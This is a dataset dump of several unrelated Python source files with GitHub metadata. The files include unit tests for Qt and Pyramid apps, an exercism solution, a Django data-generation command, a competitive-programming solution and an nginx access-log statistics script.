self.dialog = LASViewDialog(None)
def tearDown(self):
"""Runs after each test."""
self.dialog = None
def test_dialog_ok(self):
"""Test we can click OK."""
button = self.dialog.button_box.button(QDialogButtonBox.Ok)
button.click()
result = self.dialog.result()
self.assertEqual(result, QDialog.Accepted)
def test_dialog_cancel(self):
"""Test we can click cancel."""
button = self.dialog.button_box.button(QDialogButtonBox.Cancel)
button.click()
result = self.dialog.result()
self.assertEqual(result, QDialog.Rejected)
if __name__ == "__main__":
suite = unittest.makeSuite(LASViewDialogTest)
runner = unittest.TextTestRunner(verbosity=2)
runner.run(suite)
|
[
"sj.jainsumeet@gmail.com"
] |
sj.jainsumeet@gmail.com
|
2f5967e6049febff8cd322592dac07a8b7608b91
|
a90fdaaf495445f7784a00ee92a22ac82ce93387
|
/bob/bob.py
|
0b910655bef3b4b498bd32a7654b31a122318018
|
[] |
no_license
|
bwielk/PythonExercisms
|
db0afbdaee9cbb68c227a555970eae1ad0c66fc6
|
7db4110dc0d2438a45dfa59fa906d09ee8872073
|
refs/heads/master
| 2020-04-09T05:06:50.725198
| 2019-03-27T22:25:36
| 2019-03-27T22:25:36
| 160,051,761
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 502
|
py
|
def hey(phrase):
phrase = phrase.strip().replace(' ', '')
print(phrase)
if any(char.isalnum() for char in phrase) or phrase.endswith(('?', '!')):
if phrase.endswith('?'):
if phrase[:-1].isupper():
return 'Calm down, I know what I\'m doing!'
return 'Sure.'
if phrase[:-1].upper() == phrase[:-1] and any(char.isalpha() for char in phrase):
return 'Whoa, chill out!'
return 'Whatever.'
return 'Fine. Be that way!'
|
[
"bwielk@gmail.com"
] |
bwielk@gmail.com
|
71e42429891ffc550d53181d62fb0dca2616e957
|
35d83b88488a0f492dea22128dd4d6e7c8a5bef0
|
/tutorial/test.py
|
efcf5ace8b0a0d9b192d74a524a3633ef28b2516
|
[] |
no_license
|
JoshyJosh/pyramid_python_test
|
879913228f7bf934830419549df8c378784b9e26
|
3775656fc981f10385b031d98b7be073d98d029e
|
refs/heads/master
| 2021-07-10T11:24:00.050023
| 2017-10-10T05:21:55
| 2017-10-10T05:21:55
| 106,369,498
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,122
|
py
|
import unittest
from pyramid import testing
class TutorialViewTest(unittest.TestCase):
def setUp(self):
self.config = testing.setUp()
def tearDown(self):
testing.tearDown()
def test_home(self):
from .views import home
request = testing.DummyRequest()
response = home(request)
self.assertEqual(response.status_code,200)
self.assertIn(b'Visit', response.body)
def test_hello(self):
from .views import hello
request = testing.DummyRequest()
response = hello(request)
self.assertEqual(response.status_code,200)
self.assertIn(b'Go Back', response.body)
class TutorialFunctionalTests(unittest.TestCase):
def setUp(self):
from tutorial import main
app = main({})
from webtest import TestApp
self.testapp = TestApp(app)
def test_home(self):
res = self.testapp.get('/', status=200)
self.assertIn(b'<body>Visit', res.body)
def test_howdy(self):
res = self.testapp.get('/howdy', status=200)
self.assertIn(b'<body>Go back', res.body)
|
[
"herukula@gmail.com"
] |
herukula@gmail.com
|
e76c35090c2ec35f2fb8e09d06523b6955ab7704
|
acbf27438bdc56c60c3c37824156b5e460bb1127
|
/unittest_vs_pytest.py
|
8b07dfb2dffbfff89b7d13832b58b2175ee8a77d
|
[] |
no_license
|
SHalifaxK/Unittest
|
82e7d636a624c76a6d6deca07458f52f9367265b
|
decc0bebb9cd096a71e41eff93f134b489128595
|
refs/heads/master
| 2021-09-14T07:07:14.873309
| 2018-05-09T08:53:39
| 2018-05-09T08:53:39
| 115,880,343
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 570
|
py
|
'''
Unittest comes with python default package
And pytest you need to install separately (pip install -U pytest)
'''
#Using Unittest
import unittest
def upper_reverse(text):
return ''.join(reversed(text.upper()))
class TestUpperReversed(unittest.TestCase):
def test_upper_reversed(self):
self.assertEqual(upper_reverse('hello'), 'OLLEH')
if __name__=='__main__':
unittest.main()
'''
#Using pytest
def upper_reverse(text):
return ''.join(reversed(text.upper()))
def test_upper_reverse():
assert upper_reverse('hello') == 'OLLEH'
'''
|
[
"noreply@github.com"
] |
SHalifaxK.noreply@github.com
|
f4c626825779eb5f45106b655f509a0adbd02db0
|
99c8cec11b4482d47fa446f54da9c2ba4f2d2e32
|
/teachers/management/commands/generate_teachers.py
|
f1ab0e98ce81a9ecff56eedaef947e1dbb6715c2
|
[] |
no_license
|
IefremovRoman/django_efremov
|
1c11955c9bda5115ac8b1f98430ea688ab9ae2db
|
0540962fc297b5656837a819f89f6e7fcf2b89a5
|
refs/heads/main
| 2023-08-30T03:42:48.245382
| 2021-11-01T17:39:38
| 2021-11-01T17:39:38
| 393,634,317
| 0
| 0
| null | 2021-11-04T10:08:14
| 2021-08-07T09:08:38
|
Python
|
UTF-8
|
Python
| false
| false
| 2,037
|
py
|
import json
import os
from random import choice, randint
from string import ascii_uppercase
from django.core.management import call_command
from django.core.management.base import BaseCommand
from faker import Faker
from groups.models import Group
from teachers.models import Teacher
locale = 'uk_UA'
faker = Faker(locale)
__location__ = os.path.realpath(
os.path.join(os.getcwd(), os.path.dirname(__file__)))
json_file = os.path.join(__location__, 'university_subjects.json')
# json_file = 'teachers/management/commands/university_subjects.json'
# json_file = os.path.join(BASE_DIR, ".env")
class Command(BaseCommand):
def __init__(self):
super(Command, self).__init__()
self.help = 'Generate teachers'
def add_arguments(self, parser):
parser.add_argument('total', nargs='?', type=int, default=100)
def handle(self, total, *args, **kwargs):
# count = kwargs.get('total', 100)
# count = kwargs.get('total') if kwargs.get('total') else 100
with open(json_file, 'r') as file:
subjects = json.load(file)
for t in range(total):
teacher = Teacher(
first_name=faker.first_name(),
last_name=faker.last_name(),
age=faker.random_int(min=30, max=100),
subject=choice(subjects),
phone=f'+38000{faker.msisdn()[0:7]}'
)
teacher.save()
students_qnt = randint(1, 10)
start_year = randint(1984, 2016)
group = Group(
title=choice(ascii_uppercase) + '%02d' % (abs(start_year) % 100),
start_year=start_year,
finish_year=start_year + 5,
student_quantity=students_qnt,
teacher_id=teacher
)
group.save()
call_command('generate_students', total=students_qnt, group_id=group.id)
message = f'{total} teacher(s) successfully created!'
self.stdout.write(self.style.SUCCESS(message))
|
[
"iefremov.roman@gmail.com"
] |
iefremov.roman@gmail.com
|
a031f4b11cba14f9b127b12718eae04f18e82750
|
4aae3b711c7b20c0f9c9b7cff579fd22a11e021e
|
/nginx_log.py
|
2ec902c89fe4e34136419c110de1ffb366c18cbd
|
[] |
no_license
|
lbemi/Spython3
|
84cccbbf813a0bad90c155292eab4c49afdf1ab5
|
24f5f169cb0753e8c6ea284fc072fefd688199a2
|
refs/heads/master
| 2022-09-17T02:30:02.364146
| 2018-11-21T06:20:18
| 2018-11-21T06:20:18
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,750
|
py
|
import fileinput
import re
import time
from collections import Counter
import math
import sys
from datetime import datetime, timedelta
# 初始化显示的日志条目,None表示显示全部
records = None
# 脚本使用方法
def usage():
print('Usage: %s nginx_log_file [max_record_nums] [datetime]' % sys.argv[0])
print('Usage: [max_record_nums] for int number. eg: 10 ')
print('Usage: [datetime] for [5d | 5h | 5m | 5s] for [5 days | 5 hours | 5 minutes | 5 seconds]')
print('eg: ./ngx.py /var/log/nginx/access.log [10] [5d | 5h | 5m | 5s]')
sys.exit(0)
# 过去多长时间的时间点时间戳
def tmstamp():
if len(sys.argv) <= 3:
# return datetime.now().timestamp()
return 0
elif re.match('^[\d]+d$', sys.argv[3]):
return (datetime.now() - timedelta(days=float(sys.argv[3].rstrip('d')))).timestamp()
elif re.match('^[\d]+h$', sys.argv[3]):
return (datetime.now() - timedelta(hours=float(sys.argv[3].rstrip('h')))).timestamp()
elif re.match('^[\d]+m$', sys.argv[3]):
return (datetime.now() - timedelta(minutes=float(sys.argv[3].rstrip('m')))).timestamp()
elif re.match('^[\d]+s$', sys.argv[3]):
return (datetime.now() - timedelta(seconds=float(sys.argv[3].rstrip('s')))).timestamp()
else:
usage()
# 转换字节单位
def convertBytes(bytes, lst=['B', 'KB', 'MB', 'GB', 'TB', 'PB']):
i = int(math.floor(math.log(bytes, 1024)))
if i >= len(lst):
i = len(lst) - 1
return ('%.2f ' + lst[i]) % (bytes / math.pow(1024, i))
# 日志解析生成器
def ngx():
try:
with fileinput.input(sys.argv[1]) as f:
for line in f:
ip, _, _, dtime, _, mthd, _, _, status, size, *_ = re.split('[\s"]+', line)
dtstamp = time.mktime(time.strptime(dtime.lstrip('['), '%d/%b/%Y:%H:%M:%S'))
yield [ip, status, size, dtstamp]
except:
usage()
# 参数判断
if len(sys.argv) < 2 or len(sys.argv) > 4:
usage()
if len(sys.argv) < 3:
records = None
elif len(sys.argv) == 3:
try:
re.match('[\d]+', sys.argv[2])
records = int(sys.argv[2])
except:
usage()
elif len(sys.argv) == 4:
try:
re.match('^[\d]+[dhms]$', sys.argv[3])
except:
usage()
# 初始化各统计变量
iptotal, ipsize, ip200, ip302, ip304, ip403, ip404, ip500, ip502, ip503, totsize = Counter(), Counter(), Counter(), Counter(), Counter(), Counter(), Counter(), Counter(), Counter(), Counter(), 0
# 定义映射表头
header = ['ip', 'statuscode', 'size', 'dtstamp']
# 进行迭代统计
for line in ngx():
# 将两个列表转换为字典
datadict = dict(zip(header, line))
# 统计n天/时/分/秒之前的访问量和带宽等信息
if datadict['dtstamp'] > tmstamp():
# 每个IP的流量带宽
ipsize[datadict['ip']] += int(datadict['size'])
# 总流量
totsize += int(datadict['size'])
# 每IP的总访问量
iptotal[datadict['ip']] += 1
# 统计个状态码的请求数
if datadict['statuscode'] == '200':
ip200[datadict['ip']] += 1
elif datadict['statuscode'] == '302':
ip302[datadict['ip']] += 1
elif datadict['statuscode'] == '304':
ip304[datadict['ip']] += 1
elif datadict['statuscode'] == '403':
ip403[datadict['ip']] += 1
elif datadict['statuscode'] == '404':
ip404[datadict['ip']] += 1
elif datadict['statuscode'] == '500':
ip500[datadict['ip']] += 1
elif datadict['statuscode'] == '502':
ip502[datadict['ip']] += 1
elif datadict['statuscode'] == '503':
ip503[datadict['ip']] += 1
# 判断是否有存在数据,存在则打印,否则,输出错误信息!
if totsize:
# 打印网站总流量,总访问量
print("\nTotal traffic : %s Total request times : %d\n" % (convertBytes(totsize), sum(iptotal.values())))
# 打印表头
print('%-15s %-10s %-12s %-8s %-8s %-8s %-8s %-8s %-8s %-8s %-8s' % (
'Ip', 'Times', 'Traffic', '200', '302', '304', '403', '404', '500', '502', '503'))
print('%-15s %-10s %-12s %-8s %-8s %-8s %-8s %-8s %-8s %-8s %-8s' % (
'-' * 15, '-' * 10, '-' * 12, '-' * 8, '-' * 8, '-' * 8, '-' * 8, '-' * 8, '-' * 8, '-' * 8, '-' * 8))
# 打印前多少条数据
# for k, v in sorted(iptotal.items(), key=lambda v: v[1], reverse=True):
for k, v in iptotal.most_common(records):
print('%-15s %-10s %-12s %-8s %-8s %-8s %-8s %-8s %-8s %-8s %-8s' % (
k, v, convertBytes(ipsize[k]), ip200[k], ip302[k], ip304[k], ip403[k], ip404[k], ip500[k], ip502[k], ip503[k]))
else:
print('Not found data!')
|
[
"934366858@qq.com"
] |
934366858@qq.com
|
cc46d90d2aab3e122272548b83c2f0b7d1599f4b
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03695/s658302581.py
|
4b111b4dcc5fb387aa23c5a6f49d4a93eb481a63
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 676
|
py
|
def color_judge(n):
if 1<=n<=399:
return 'gray'
elif n<=799:
return 'brown'
elif n<=1199:
return 'green'
elif n<=1599:
return 'light blue'
elif n<=1999:
return 'blue'
elif n<=2399:
return 'yellow'
elif n<=2799:
return 'orange'
elif n<=3199:
return 'red'
else:
return 'choice'
n = int(input())
a = list(map(int, input().split()))
dic = {}
for i in a:
if dic.get(color_judge(i)):
dic[color_judge(i)] += 1
else:
dic[color_judge(i)] = 1
choice = 0
l = len(dic)
if dic.get('choice'):
choice = dic['choice']
l -= 1
print(max(1, l), l+choice)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
8080cfa7c5ebb3e57d3422daf3ca44dafd3787c8
|
b0bae65e703fa5f787cbe4dd321a5d0eff7af147
|
/developer/developer/urls.py
|
fd6ec118368545c4027c549067d1524b5b1babab
|
[] |
no_license
|
thalesh-kashyap/Developer_Repo
|
bad980f241db4cfa784bdc4fbe893befbd8c5f12
|
6f0caba049182ceca26197711c05bd2cea5f15bf
|
refs/heads/main
| 2023-04-16T04:03:07.636136
| 2021-04-30T10:49:57
| 2021-04-30T10:49:57
| 363,106,160
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,153
|
py
|
"""developer URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
# from django.contrib import admin
# from django.urls import path,include
# urlpatterns = [
# path('admin/', admin.site.urls),
# path('home',include('addEmp.urls')),
# ]
from django.conf.urls import url, include
from django.contrib import admin
from addEmp import views
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^home/', include('addEmp.urls')),
url(r'^', include('authapp.urls')),
url(r'^searchEmp/', include('searchEmp.urls')),
url(r'^developer/', views.DeveloperForm),
]
|
[
"68849549+thalesh-kashyap@users.noreply.github.com"
] |
68849549+thalesh-kashyap@users.noreply.github.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.